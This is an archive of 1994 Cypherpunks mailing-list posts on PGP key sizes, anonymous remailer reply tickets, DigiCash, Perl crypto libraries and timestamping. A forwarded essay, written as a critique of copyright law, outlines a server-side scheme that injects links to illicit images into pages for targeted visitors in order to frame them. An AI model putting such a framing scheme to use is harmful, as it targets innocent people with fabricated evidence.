bits). > >I wasn't aware that this feature was programmed into this version of PGP. I >always thought that there was simply going to be another upgrade that would >allow the larger key sizes. > >Can anyone shed some light on this??? You beat me to the post :( I tested this out earlier today. I changed the system clock and I got this: Type bits/keyID Date User ID pub 1024/BEB3ED71 1994/09/18 J.L.Francois pub 2047/D9E1F2E9 1995/01/01 Francois, J.L It works but take a lot more time, obviously, to generate the key. ***************************Frenchie Sends********************************* * 1024/Key ID: BEB3ED71 J. Francois 2048/Key ID: D9E1F2E9 * * As soon as any man says of the affairs of the state * * "What does it matter to me?" the state may be given up for lost. * * J.J.Rousseau - The Social Contract * ********************Want to know more about PGP? Ask me!****************** -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwYqJrbmxeO+s+1xAQFfuwP/SjLrZsCdyiNERSxUyoDYyjcwpXZHw9o5 LdDV//DHEhttFCbiND5pbza+1Uiw+SubmwHCuP3UCSER9WtFWDd4SV7GcD2YDDiL DFwVYynp4jLd9HvbA2eHgguZ5uNO7xBXWyBaDkMeFHDdB3oP7QuUDpJz4IDwm7xs 0KcgRYvaQdc= =8qoX -----END PGP SIGNATURE----- From wesf at unicycle.cs.tulane.edu Sat Dec 3 20:24:55 1994 From: wesf at unicycle.cs.tulane.edu (Wes Felter) Date: Sat, 3 Dec 94 20:24:55 PST Subject: Moto Secure Clear digital? Message-ID: <9412040430.AA29360@unicycle.cs.tulane.edu> I just got a second phone line, and decided that if I was going to get a 2-line phone it might as well be a good one, so I am considering a Motorola Secure Clear cordless 2-line phone with speakerphone. This will be quite an investment,so I was wondering whether the Secure Clear phones are digitally encrypted or merely scrambled using some analog method. Anybody know about this? How secure are these phones really? --Wes Wesley Felter wesf at unicycle.cs.tulane.edu I speak for no one. Trust no one. Cryptography is outlawed and only the outlaws care. When thinking is outlawed, maybe then somebody will care. When thinking is outlawed, only outlaws will be able to care. From cactus at hks.net Sat Dec 3 20:27:32 1994 From: cactus at hks.net (L. Todd Masco) Date: Sat, 3 Dec 94 20:27:32 PST Subject: NYT on Insecure Phones Message-ID: <199412040432.XAA13619@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412040246.VAA25360 at pipe3.pipeline.com>, John Young wrote: > Cellular One of Washington-Baltimore, owned by SBC > Communications Inc., has sent its customers letters > notifying them that it would block the service beginning on > Thursday because it had compiled a huge backlog of phone > numbers used in New York that appeared to be fraudulent. It's worse than that! They will allow customers to use their service in NYC, I'm told by a customer of their's visiting this weekend, if they pay for the call with a credit card (IE, VISA, MC, etc) that they must *give* *an* *operator* *over* *the* *cellphone*. So to avoid their own exposure to fraud, they're requiring their customers to give credit card info over the cellphone. Thanks, guys. No pro-34s 'round here, nope. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuFGUioZzwIn1bdtAQF98wGAiBKy9nk/SzN7Nb/8v/noLEZDJgRCZy71 pjyDqlAtjnnQ0KelgzqDPLr8LIXAo8Eq =+JzJ -----END PGP SIGNATURE----- From jdwilson at gold.chem.hawaii.edu Sat Dec 3 21:45:04 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Sat, 3 Dec 94 21:45:04 PST Subject: How do *I* use PGP? In-Reply-To: Message-ID: On Sat, 3 Dec 1994, Bob Snyder wrote: > > What kind of machine is it? How do you read mail? A PC mail reader? > > >My primary access to this account is through my IBM xt (dos 3.3) at work. > >This machine is occasionally used by others and is outside of my control. Use PGP DOS and keep your key on a diskette. W/640K you should be ok. -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> From MIKEINGLE at delphi.com Sun Dec 4 02:15:04 1994 From: MIKEINGLE at delphi.com (Mike Ingle) Date: Sun, 4 Dec 94 02:15:04 PST Subject: Interoperability, one-use remailer tickets Message-ID: <01HK8FKNB3LE90PJWN@delphi.com> The remailers need a one-time reply mechanism. This would enable many other things, including "persistent" anonymous entities, without using broadcast techniques. The current remailers encourage hit-and-run anonymity, like the recent burst of anonymous nastiness, and discourage conversational anonymity and persistent anonymous entities. Sending a one-way message is easy and fairly secure. Creating a reply ticket is not very secure. The ticket can be replayed through the net to trace the path taken, and since the text following the ticket it sent in clear, it is easy to trace. The ticket can also be decrypted by coercion or hacking of the remailer machines. In general, there is enough persistent information available to trace any reply ticket. This is a bad thing. A one-shot reply ticket would be designed so that, after the ticket was used or a set time had passed, the ticket was no longer valid and the information needed to trace the path, partially stored in the remailers, was gone. One way to do this: each remailer has a list of secret (symmetric) keys. Each secret may have an expiration date. By some method (problem discussed later) the user and the remailer establish a shared secret, adding it to the list, while the remailer does not find out who the user is. The reply ticket contains a series of nested hops, each encrypted with that remailer's secret plus all the others after it. When the ticket is used, the remailer decrypts one layer of the ticket to obtain the next hop. It then encrypts the message with that secret key. Now it forgets the secret key (poof!) and passes the message and remainder of the ticket on to the next remailer. The ticket is getting decrypted at each hop, and the message is getting encrypted. Thus there is nothing recognizable between hops, and the trail is burning up as the message propagates. At the terminal end, the recipient applies all of the secret keys in the proper order to decrypt the message. Of course, an additional end-to-end public-key encryption is also an option. The catch: how do we establish a shared secret with the remailer, without identifying ourselves to it? If the first remailer (the one the replyer sends the ticket to) is corrupt, and it knows who established the secret contained in the ticket, it knows the end-to-end path of the message. Solution 1: each remailer has a public key. To establish shared secrets with a series of remailers, you send a normally-chained and nested message, using each remailer's public key. Each remailer decrypts a layer, stores the secret contained for it, and passes the message on. The first few remailers may not get secrets; they are just there to anonymize the message. Problem: secret-establishing message is replayed, setting trail back up, then reply ticket is replayed. Solution: when a secret is used, it is one-way hashed, the hash stored, the secret forgotten. Secrets which have already been used will not be accepted the second time. When the used secrets list gets full, a new public/secret pair is generated and the old one is forgotten, preventing any more replays. Problem: remailers are coerced or hacked to decrypt a captured secret- establishing message, before the secret key is expired. Trail of a reply ticket can then be followed. Solution: no good one that I can think of. Solution 2: establish a shared secret by a simple, direct Diffie-Hellman exchange with the remailer. You send a public-piece in a message, remailer sends you a public-piece, both sides compute the secret. If the remailer is corrupt, it now knows who you are. This is a level-1 secret. Use the level-1 secret as a reply ticket to establish a secret with another remailer. Message goes through a remailer, to the target you want to establish a secret with. Target replies using the level-1 secret. This is a level-2 secret; two remailers have to be corrupt to trace this secret to you. If you want, use the level-2 secret for another exchange to create a level-3 secret, and so on until your comfort zone is reached. An automatic program sits around stockpiling secrets for you. Problem: high bandwidth. Does anyone know of a better way to establish a shared secret in an untraceable way? Both of these methods have their problems. Given a secure two-way messaging mechanism, persistent anonymous identities are established using a "pigeonhole service". This is a service, with a publicized address, that will accept public-key encrypted mail and store it in a "pigeonhole". The owner of the pigeonhole anonymously sends a request (with authentication) and a reply ticket. The pigeonhole service sends the owner his mail using the ticket. Anonymous users would need a client that could set up trails, create tickets, request mail from the pigeonhole, etc. One nice feature of the system is that non-anonymous users could talk to anonymous users without having a client. The anonymous message would be of the form: --- BEGIN REPLY TICKET (LEAVE AT HEAD OF REPLY) --- (Reply ticket ciphertext) --- END REPLY TICKET --- Message text The non-anonymous user could reply with any mail reader, send the message back to the remailer that sent it to him, and the message would be transported securely back to the anonymous user that sent it. For something complex like this, we need a language with a little more leverage than C provides. For this and other complex protocols, I've ported RSAREF 2.0 to Perl. The interface does not require you to recompile Perl. It uses a C daemon and pipes. It provides symmetric encryption, public-key encryption, digital signatures, hashing, DH exchange, and ASCII armor. The algorithms used are MD5, MD2, DES, DESX, triple-DES, RSA, and DH. It has a good (eval/die) exception handling mechanism, and a very thorough regression testing script. For reliability in a large remailer network, end-to-end reliability is better than point-to-point reliability. Messages should be m-of-n secret shared before transmission, and reassembled at the terminal end. For clientless reception, the terminal node remailer could do the reassembly and splitting of replies. Code for secret sharing is available, but most secret-sharing algorithms create shadows each the size of the message. This can be avoided: use an error correcting code to add enough information to the original so the message can be recreated with any m of n pieces. Break into pieces, encrypt each piece, and secret-share the key. Where can I get an error correction algorithm that can do this? You should be able to increase a file's size by 50% and then have any two of three pieces recreate it, for example. I want to add other algorithms to the Perl encryption package. The secret sharing, for one. A one-function call to gzip for compression. A blind signature if I could get patent permission (not from Chaum; how's Brands?) or perhaps just do it with a "research purposes only" disclaimer. Someone with Visual Basic experience could do a DOS/Windows VBX module to enable easy writing of PC clients for neat net-based servers written with the Perl encryption package. As Tim, Eric and others have pointed out, the problem of widespread, usable crypto is essentially the whole problem of interoperability across a network. Covering Unix for servers and Windows for clients would be a large step in the right direction. Mike From eric at remailer.net Sun Dec 4 06:53:52 1994 From: eric at remailer.net (Eric Hughes) Date: Sun, 4 Dec 94 06:53:52 PST Subject: Brands excluded from digicash beta In-Reply-To: Message-ID: <199412041552.HAA18636@largo.remailer.net> From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) The current digi-cash software, as I understand it, would work find in a real-cash situation. You would just need to pay for your ecash. "Just"? That's where _most_ of the problem is. Eric From eric at remailer.net Sun Dec 4 06:54:46 1994 From: eric at remailer.net (Eric Hughes) Date: Sun, 4 Dec 94 06:54:46 PST Subject: ecash trial issues explained In-Reply-To: <199412040013.AA21097@xs1.xs4all.nl> Message-ID: <199412041550.HAA18633@largo.remailer.net> From: Alex de Joode One of the limitations of the DDS is that mail only can be send to adresses that are in the .nl domain, so you cannot forward your mail. Really? Can't it be packaged up and automatically sent through an Amsterdam anonymous remailer back to oneself? Eric From eric at remailer.net Sun Dec 4 06:56:46 1994 From: eric at remailer.net (Eric Hughes) Date: Sun, 4 Dec 94 06:56:46 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412040223.UAA00225@omaha.omaha.com> Message-ID: <199412041555.HAA18642@largo.remailer.net> From: Alex Strasheim Unless Digicash has significant problems with banks or governments that I don't know about (always a possibility), I have a simple rule of publicity here. If there were a bank who had already agreed to back ecash, would it not already have been announced? Since no announcement of the sort has been forthcoming, I conclude that the probability that such a backer exists right now is low. Eric From jya at pipeline.com Sun Dec 4 07:12:00 1994 From: jya at pipeline.com (John Young) Date: Sun, 4 Dec 94 07:12:00 PST Subject: NYT on Wireless Data Systems Message-ID: <199412041511.KAA24188@pipe1.pipeline.com> -----BEGIN PGP SIGNED MESSAGE----- Laurie Flynn writes today on wireless data systems by Ardis, Ram Mobile Data and the new Cellular Digital Data Packet. For email copy send blank message with subject: WIR_no - -----Key ID 34EE1095 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuGxFYSb9hQ07hCVAQHPfwP/bubk1tJ+OXcYGsjpSsOwNIw9M3QBEBzj btC/Trus4qfFPhpzt5Kl84cuybF3i0iW5yUgwNKOMSKKWn40Z6pwm4dWGlUi71LW Qil3s8cPYNIiyd/gc15G5RZzw3UX/YLDDMukWawVblz5eJW0lwcasYoUb7jwju8m e4ny978LIm8= =7GE/ -----END PGP SIGNATURE----- From paul at poboy.b17c.ingr.com Sun Dec 4 08:49:19 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Sun, 4 Dec 94 08:49:19 PST Subject: www-buyinfo list In-Reply-To: <199412032022.OAA01633@omaha.omaha.com> Message-ID: <199412041649.AA06103@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- www-buyinfo-request at allegra.att.com - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuHy+qfb4pLe9tolAQFaQAQAt3ngh3PexOQnvWC+cCjtG+Yee2fjYgQP hsZOAFCwjKIN9n6ZXKskanCXNCpSprOhCNAbp0H6/foQ5vw+r9ooAen9RVN+yCOF 7YcktzXysXdgoUMiWgUC+9V9RrI9ST8K14wvW5i1ucJ02UHhHOPZ5hqKe5HOmXbe ZcMGk2A7O2I= =b8D5 -----END PGP SIGNATURE----- From paul at poboy.b17c.ingr.com Sun Dec 4 09:09:42 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Sun, 4 Dec 94 09:09:42 PST Subject: ecash trial issues explained In-Reply-To: <9412031245.AA25009=brands@zeus.cwi.nl> Message-ID: <199412041647.AA06076@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Stefan Brands wrote: > I have not contributed to this discussion in any way afterwards. In light of > this, I most certainly felt unhappy with the subject of "Brands excluded from > digicash beta" someone decided to choose; the wording "excluded" implies > something (the deliberateness of the whole thing) which I certainly did not > intend to imply (and do not believe). I am at least partially responsible for this, and I apologize. It is not fair to imply either that Digicash intentionally excluded Brands or that Brands claimed that they had. It looks like everyone's concerns and complaints have been addressed. Thanks to the folks from Digicash for their work. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuHynKfb4pLe9tolAQE/kAQAvrJ71y/jN4FMWO8aoAkhQjP1V/6kpork J74x85O3QvXRs1S6nsAyRGiAextT0GS7LHHyCVerh4/4Gwk6LgKk2TzaPJxp5oyU RUTFS16ghIWGzWmjkL/MXuinRxvaN4hogIqNJ/pARbdwW6Ncm/I4VBk+WSFEM2ha MA1UyViLFc4= =QewS -----END PGP SIGNATURE----- From hfinney at shell.portal.com Sun Dec 4 10:00:24 1994 From: hfinney at shell.portal.com (Hal) Date: Sun, 4 Dec 94 10:00:24 PST Subject: Interoperability, one-use remailer tickets In-Reply-To: <01HK8FKNB3LE90PJWN@delphi.com> Message-ID: <199412041800.KAA02674@jobe.shell.portal.com> Mike Ingle writes: [Part about remailers deleted] >For something complex like this, we need a language with a little more >leverage than C provides. For this and other complex protocols, I've ported >RSAREF 2.0 to Perl. The interface does not require you to recompile Perl. >It uses a C daemon and pipes. It provides symmetric encryption, public-key >encryption, digital signatures, hashing, DH exchange, and ASCII armor. >The algorithms used are MD5, MD2, DES, DESX, triple-DES, RSA, and DH. >It has a good (eval/die) exception handling mechanism, and a very thorough >regression testing script. >[...] >I want to add other algorithms to the Perl encryption package. The secret >sharing, for one. A one-function call to gzip for compression. A blind >signature if I could get patent permission (not from Chaum; how's Brands?) >or perhaps just do it with a "research purposes only" disclaimer. Someone >with Visual Basic experience could do a DOS/Windows VBX module to enable >easy writing of PC clients for neat net-based servers written with the Perl >encryption package. This is very exciting! Could you show some examples of how your code would be used with Perl? Some kind of script that could work with MP numbers or RSA decrypt a file? It would be very good to have a prototyping language like Perl with crypto addons. >Code for secret sharing is available, but most secret-sharing algorithms >create shadows each the size of the message. This can be avoided: use an >error correcting code to add enough information to the original so the >message can be recreated with any m of n pieces. Break into pieces, encrypt >each piece, and secret-share the key. Where can I get an error correction >algorithm that can do this? You should be able to increase a file's size by >50% and then have any two of three pieces recreate it, for example. Try looking for a package called Shade using Archie. Here is an excerpt from the doc file: > `shade' is a file splitting and merging utility. It takes a large > file and splits it into uniformly sized blocks. It can also output > extra blocks (called shadows). These shadows can be used to recover > missing sections if they get corrupted or it they are lost. With a > single shadow, `shade' can recover ANY single missing block. As many > shadows are needed as there are blocks missing. If too few blocks > and shadows are available, nothing can be recovered. > > For example, foo.bar (259042 bytes) is split into 5 sections > of 45000 bytes, 1 section of 34042 bytes and 2 shadows of > 45000 bytes. Each of these 8 parts is sent through email. > Even if any two of these eight parts gets lost, the original > foo.bar can be reconstructed. > > `shade' is a simple application of the chinese remainder theorem > for polynomials with coeficients modulo two. For more information > see the comments at the beginning of project.c. As for the remailer return address idea, I would suggest looking at Chaum's 1981 paper from CACM which has a similar concept. I believe it was posted here recently. Instead of using shared secrets he had the secret key at each hop get embedded in the return address itself. Hal From Tony.Gurnick at nzdairy.co.nz Sun Dec 4 12:19:07 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Sun, 4 Dec 94 12:19:07 PST Subject: Timestamping Message-ID: <94120509115477@nzdairy.co.nz> Could the cypher punks automatic signing also be used as a distributed timestamping service? Where you send a hash/document to it and it timestamps and signs it, to the fact that this hash was in existsence at the specified time. Then it would forward your message on to another such service picked at random until the hash has been stamped the number of times you specified. If you collect a number of timestamps from around the world you could make a case for a document existsing at a certian time. You could also back & forward link in time to other documents that each timestamp services has stamped! Any comments???? T From rarachel at photon.poly.edu Sun Dec 4 12:28:37 1994 From: rarachel at photon.poly.edu (Arsen Ray Arachelian) Date: Sun, 4 Dec 94 12:28:37 PST Subject: Censorship In Cyberspace 1/6 In-Reply-To: <199411302117.AA30877@ideath.goldenbear.com> Message-ID: <9412042031.AA05235@photon.poly.edu> > >The Moderator: > >John Kennedy Taylor is the author of "Reclaiming the Mainstream: > ^^^^ > Shouldn't this be "Joan"? Yep, it should infact be Joan. I didn't take the time to go over this before posting it to the list. :-) I'm sure there are other errors. From cactus at seabsd.hks.net Sun Dec 4 12:38:34 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Sun, 4 Dec 94 12:38:34 PST Subject: Timestamping Message-ID: <199412042043.PAA23441@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <94120509115477 at nzdairy.co.nz>, DNA wrote: >Could the cypher punks automatic signing >also be used as a distributed timestamping service? Absolutely. That was one of my financial motivations for writing the code, and why the "Gratis" is mentioned in the comment. As is, I don't think there's a market available for it yet... but having the code is a good hedge, as is the increased awareness that it's a possible use of digital signatures. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuIp3ioZzwIn1bdtAQH2cQGAthnwkpw6QvfJspGfZ1Dkxu1Yh+x8Wikv RC8evXmgyQBbUpr3TA7k0GGFR8YWD6GV =A8+p -----END PGP SIGNATURE----- From skaplin at skypoint.com Sun Dec 4 14:07:40 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Sun, 4 Dec 94 14:07:40 PST Subject: Date for 2048 bit Keys?? In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: > [BEGIN PGP SIGNED MESSAGE] > I saw an interesting thread in alt.security.pgp about when PGP v 2.6.2 will > handle key sizes of up to 2048 bits. Someone speculated that it will take > effect in the middle of the month (ie after Dec. 15 you type pgp -kg and > it will give you four choices, the last one of up to 2048 bits). > > I wasn't aware that this feature was programmed into this version of PGP. I > always thought that there was simply going to be another upgrade that would > allow the larger key sizes. > > Can anyone shed some light on this??? > What I wound up doing was changing my computer's date to 12-25-94 then I generated a key. There is no menu choice for a 2048 bit key, but if you enter 2048 in it works. It really takes a long time (~20 minutes on a 486dlc 40mhz machine) Sam - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAy795M4AAAEH/3K4WyZywwdndt0e1ZZ3jeOdsICCcQzZIP+N67VVyp6AukW4 kADHzSv2W6nbLjT5qQ6c21BQnFUv7AvX6BIHh1BOndu/DRo3MeFD0LkxK5IafSrs LT7wzg1YQI/nSJ7MZ6kZ4m8XnYUKNwcM9F/OHz22/IV59qwL+5+bTeOvuvFW+kjy MCI6FlBQXCZN3FZw5zlEy8+lEudJiRzr9zT1wa6MV0xpYNNCAR2EOVxJ2b7eHn8J eSNQhVCoeSgdBN0P5CiI0E1tYlAKHemzKHdJJ+ssTaQ8OT282oJw2IiOc4mXeLa+ 83ws1B14gUMAmEzQJDzncbOFe0uFyWdfEFFKB80ABRG0JFNhbXVlbCBLYXBsaW4g PHNrYXBsaW5Ac2t5cG9pbnQuY29tPokAlQMFEC795V0KZ4pnlgH9xQEBUOYD/2/l fzxUAMQIiTjDJs6QljOyeRDXtl7roKlN9zA5h5szBx/ivpd0zRRrMiW8vGgetfVF bPR/uMudQuq3iQhAnrbZoi0tg+2rQ7sgj/bj9bqPgNxi+aAEUjMhJED1gB3F/R2a ww6BhETsIHg/gCNr5lX/h0WIEk1FXYHfCr9CPA5k =2L++ - -----END PGP PUBLIC KEY BLOCK----- ============================================================================== You say you are lying. But if everything you say is a lie, then you are telling the truth. You cannot tell the truth because everything you say is a lie. You lie, you tell the truth ... but you cannot, for you lie. -- Norman the android, "I, Mudd", stardate 4513.3 ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLuI8d8lnXxBRSgfNAQG2iQf/RDjSSIJS7XQu0CbCjRUQgB6KHzg/pT5X i0wp/CqFot30tQUdhS09npeyL7O1nHyxIgeqgE8FCI28mSn2TRkmb26M79JUkm4u FMFoRBgx60274aievYJ96KKQD32uB88jPIKZK6g74CUWUgZThPxi2mOQV3AG8l1D pNyZCkC6nizLkepmSp4TTZF112aDZbHq1W1S90jRyGQElHRghlsngGdDqklL4KTM 4NoAG2Y6PqAdBBD3kwB7lIorTEPF5jBCxCsJW5+7wqgdKgdG9VWcVEQSE3kf0AtW w9aoJEEU4wDLgdG4Hphiw/E3IVOp9XbFcrOthbGdInxnNf6u+msHqg== =6EQ/ -----END PGP SIGNATURE----- From mccoy at io.com Sun Dec 4 14:42:09 1994 From: mccoy at io.com (Jim McCoy) Date: Sun, 4 Dec 94 14:42:09 PST Subject: Timestamping In-Reply-To: <199412042043.PAA23441@bb.hks.net> Message-ID: <199412042241.QAA06939@pentagon.io.com> > From: cactus at seabsd.hks.net (L. Todd Masco) [regarding timestamping and the auto-signing "service"...] > As is, I don't think there's a market available for it yet... but > having the code is a good hedge, as is the increased awareness that > it's a possible use of digital signatures. One should probably examine Bellcore patents regarding some of the hash chaining before offering something like this as a serious service... jim From mccoy at io.com Sun Dec 4 14:47:11 1994 From: mccoy at io.com (Jim McCoy) Date: Sun, 4 Dec 94 14:47:11 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412041555.HAA18642@largo.remailer.net> Message-ID: <199412042247.QAA07327@pentagon.io.com> > From: eric at remailer.net (Eric Hughes) > > From: Alex Strasheim > > Unless Digicash has significant problems with banks or governments that I > don't know about (always a possibility), > > I have a simple rule of publicity here. If there were a bank who had > already agreed to back ecash, would it not already have been > announced? Since no announcement of the sort has been forthcoming, I > conclude that the probability that such a backer exists right now is > low. Unless said bank wanted to set up the necessary infrastructure and possibly work in back ends to home-banking software and other pieces that make such a system usable for "real people." In all likelyhood your conclusion is most likely erroneous. jim From nobody at jpunix.com Sun Dec 4 15:07:44 1994 From: nobody at jpunix.com (Anonymous) Date: Sun, 4 Dec 94 15:07:44 PST Subject: gambling machines Message-ID: <199412042307.RAA04560@jpunix.com> Has the list ever discussed online gambling? I'm curious if anyone's ever tried to combine something like magic money with something like a simulation of a slot machine, using a coin-toss type protocol to ensure the machine isn't rigged. From cactus at hks.net Sun Dec 4 15:14:54 1994 From: cactus at hks.net (L. Todd Masco) Date: Sun, 4 Dec 94 15:14:54 PST Subject: Timestamping Message-ID: <199412042319.SAA24704@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Jim McCoy writes: > > From: cactus at seabsd.hks.net (L. Todd Masco) > [regarding timestamping and the auto-signing "service"...] I detect a note of skepticism. > One should probably examine Bellcore patents regarding some of the hash > chaining before offering something like this as a serious service... Good point, though it would seem that hash chaining would be unnecessary. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuJOiyoZzwIn1bdtAQG+DAF/VObLgw6clqAXVOoyT6t+PlBdZ7S6jX5C QLRpqGrNYOJu8aVkLhbvIy08z9ZW0lL9 =eGzd -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Sun Dec 4 15:31:37 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 4 Dec 94 15:31:37 PST Subject: 2048-bit keys?? Message-ID: <199412042331.PAA14197@jobe.shell.portal.com> just curious, how many random bytes does it take to generate these fuckers and can the keyservers out their handle em yet? From mccoy at io.com Sun Dec 4 15:31:47 1994 From: mccoy at io.com (Jim McCoy) Date: Sun, 4 Dec 94 15:31:47 PST Subject: gambling machines In-Reply-To: <199412042307.RAA04560@jpunix.com> Message-ID: <199412042331.RAA10196@pentagon.io.com> > Has the list ever discussed online gambling? I'm curious if anyone's > ever tried to combine something like magic money with something like a > simulation of a slot machine, using a coin-toss type protocol to ensure > the machine isn't rigged. For people with beta digicash clients, try http://gamezone.io.com/ IAs far as a real system goes, you will never see on running on a machine in the US in the near future; in addition to the regulatory BS involved in making magic money useful you would run into all kinds of wonderful gambling laws and regulation. jim From alano at teleport.com Sun Dec 4 15:38:00 1994 From: alano at teleport.com (Alan Olsen) Date: Sun, 4 Dec 94 15:38:00 PST Subject: future entrapment Message-ID: <199412042337.PAA01281@desiree.teleport.com> >From: Mklprc at aol.com >Date: Sun, 4 Dec 1994 09:26:11 -0500 >To: scottr at hevanet.com >Cc: alano at teleport.com, brew at mtek.com, GERICKS971 at aol.com, > 74710.3505 at compuserve.com, furseor1 at hr.house.gov >Subject: future entrapment > >Something to think about...(fwd) > >Thought you all might be interested in this excerpt from CPSR list regarding >copyrights on the Net and especially how police can use the Web to set up >stings. > >mp > > >------------------------------ > >Date: Thu, 1 Dec 1994 07:45:31 -0800 >From: Charlie Stross (by way of marsha-w at uiuc.edu >To: cpsr-global at cpsr.org > >Philosophically, I see most journalists as being filters. Some of us >read press releases, strip out the propaganda, and supply the results >(with interpretation) to the public. Some of us go and try to nail >down the story by poking around and asking questions. But ultimately >we rely on sensory input at some level -- and all we do is rearrange >it, comment on it (by referring to prior input), and punt it out again >at our readers. This is fundamentally an editorial process, and there >will be more need for it -- not less -- as the information deluge >gathers momentum. > >There's a huge problem on the net: how does copyright apply to a reference? >For example: I can't stitch a Far Side cartoon into my WWW home page. But >I _can_ embed an directive in my page, pointing to a Far >Side cartoon that is _legitimately_ stored somewhere else on the net. When >you look at my page you will see the cartoon ... and will have a bit of a >headache when you stop to think about the copyright implications. > >The precise question of what constitutes a copyright violation runs >into a wall of mud as soon as you start asking questions about sources >and hyperlinks. For example, here's the kind of havoc you can wreak by >classifying all embedded link dereferences as deliberate actions. >Suppose I am a cop in some redneck area, and I want to nail someone >who uses the net locally. I could run a _very_ neat entrapment sting >to nail people for posession of kiddie porn: > >* establish a local WWW server hosting some useful information >* configure the server to record the IP addresses of people who > access it, and cross-reference them to obtain geographical > locations as registered with NIC. Feed this into a GIS and > track local accesses. >* have a list of people who I want to nail. >* filter all HTTP requests through a script that > - checks the list of victims > - if a request for a file comes in from one of the > targets, munge the outgoing web page to include > a tag pointing to a foreign site > carrying images deemed pornographic in my jurisdiction > - ring the console bell > >As soon as someone on the hit list downloads a file, you have prima >facie evidence that they are probably in posession of some kiddie porn. >Instant search warrant time ... > >(And in case you were wondering, this is just a technology twist on top >of the recent Adult Action BBS case in Mississippi.) > >Basically, as far as I can see, conventional notions of copyright are >going to have to change -- because copying is no longer the only mechanism >for gaining posession of information. Our notions of intellectual property >may also have to change ... > > >-- Charlie > >(Who happens to write a column in Online World, and who can be found >most months in Computer Shopper and some months in PC PLUS -- all three >of them UK-based magazines unrelated to any US titles of the same name.) >------------------------------------------------------------------------- > > >++M++++I++++C++++H++++A++++E++++L++++++P+++++E+++++A+++++R+++++C+++++E++++ >| mklprc at aol.com | Knowledge for the pupil -er- people. | >| mklprc at teleport.com | Give them a light and they'll | >| "annoying Xists since 1966" | follow it anywhere! -- Firesign | >+++Y+O+U'D++P+A+Y++T+O++K+N+O+W++W+H+A+T++Y+O+U++R+E+A+L+L+Y++T+H+I+N+K+++ > > > | "Encryption ROT13s your mind." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| From MIKEINGLE at delphi.com Sun Dec 4 15:54:26 1994 From: MIKEINGLE at delphi.com (Mike Ingle) Date: Sun, 4 Dec 94 15:54:26 PST Subject: Remailers, RSAREF for PERL Message-ID: <01HK987PYP1U90PJ4I@delphi.com> I've received a couple of requests for information about the RSAREF-Perl interface. Yes, I do intend to release it, and it follows the RSAREF interface so there is no patent problem involved. It calls the DES library directly, but RSA says they have no problem with that. I'm currently waiting to hear if it is okay to call the random-number generator, so I can provide a "get random bytes" function. When I find this out, and integrate the "shade" program mentioned below, I will release it officially. I can send out Beta versions now to people who really want to test it, and will give me feedback on how it works. You need a Unix machine (no root required), a copy of RSAREF 2.0, a copy of Perl 